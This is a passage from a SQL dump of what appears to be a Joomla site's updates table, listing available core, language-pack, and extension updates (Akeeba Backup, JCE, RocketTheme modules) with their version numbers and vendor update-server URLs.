US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(26997,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(26998,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(26999,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(27000,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(27001,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(27002,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(27003,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(27004,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(27005,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(27006,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(27007,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(27008,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(27009,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(27010,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(27011,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(27012,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(27013,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(27014,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(27015,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(27016,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(27017,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(27018,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(27019,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(27020,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(27021,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(27022,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.1','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-1.html',''),(27023,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(27024,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.7.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeeba.com/download/fof3/3-7-1.html',''),(27025,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'4.8.4','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-4-8-4			\n		',''),(27026,129,0,'JCE 2.9.2','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.2','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-2-released',''),(27027,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27028,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(27029,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27030,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27031,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27032,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(27033,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27034,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27035,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27036,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27037,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-3.html',''),(27038,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27039,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27040,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27041,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-3.html',''),(27042,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27043,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27044,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27045,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-3.html',''),(27046,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27047,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27048,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-3.html',''),(27049,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27050,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27051,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27052,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27053,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27054,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27055,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-3.html',''),(27056,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27057,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27058,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27059,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27060,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-3.html',''),(27061,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27062,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(27063,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(27064,3,0,'French','','pkg_fr-FR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(27065,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(27066,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(27067,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(27068,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(27069,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(27070,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(27071,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(27072,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(27073,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(27074,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(27075,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(27076,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(27077,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(27078,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(27079,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(27080,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.24.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(27081,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(27082,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(27083,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(27084,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(27085,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(27086,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(27087,3,0,'English US','','pkg_en-US','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(27088,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(27089,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(27090,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(27091,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(27092,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(27093,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(27094,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(27095,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(27096,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(27097,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(27098,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(27099,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(27100,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(27101,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(27102,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(27103,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(27104,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(27105,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(27106,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(27107,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(27108,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(27109,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(27110,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(27111,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(27112,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(27113,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(27114,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(27115,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(27116,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(27117,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(27118,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(27119,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(27120,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(27121,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(27122,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(27124,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(27125,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(27126,57,0,'French','','pkg_fr-FR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(27127,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(27128,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(27129,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(27130,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(27131,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(27132,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(27133,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(27134,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(27135,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(27136,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(27137,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(27138,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(27139,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(27140,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(27141,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(27142,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.24.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(27143,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(27144,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(27145,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(27146,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(27147,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(27148,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(27149,57,0,'English US','','pkg_en-US','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(27150,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(27151,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(27152,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(27153,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(27154,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(27155,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(27156,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(27157,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(27158,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(27159,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(27160,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(27161,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(27162,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(27163,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(27164,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(27165,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(27166,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(27167,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(27168,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(27169,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(27170,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(27171,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(27172,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(27173,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(27174,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(27175,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.3','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-3.html',''),(27176,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(27177,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.7.3','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeeba.com/download/fof3/3-7-3.html',''),(27178,129,0,'JCE 2.9.2','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.2','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-2-released',''),(27180,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27181,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27182,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27183,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-3.html',''),(27184,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27185,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27186,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27187,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27188,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-3.html',''),(27189,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27190,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27191,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27192,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-3.html',''),(27193,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27194,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27195,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(27196,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(27197,3,0,'French','','pkg_fr-FR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(27198,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(27199,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(27200,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(27201,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(27202,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(27203,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(27204,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(27205,3,0,'Chinese 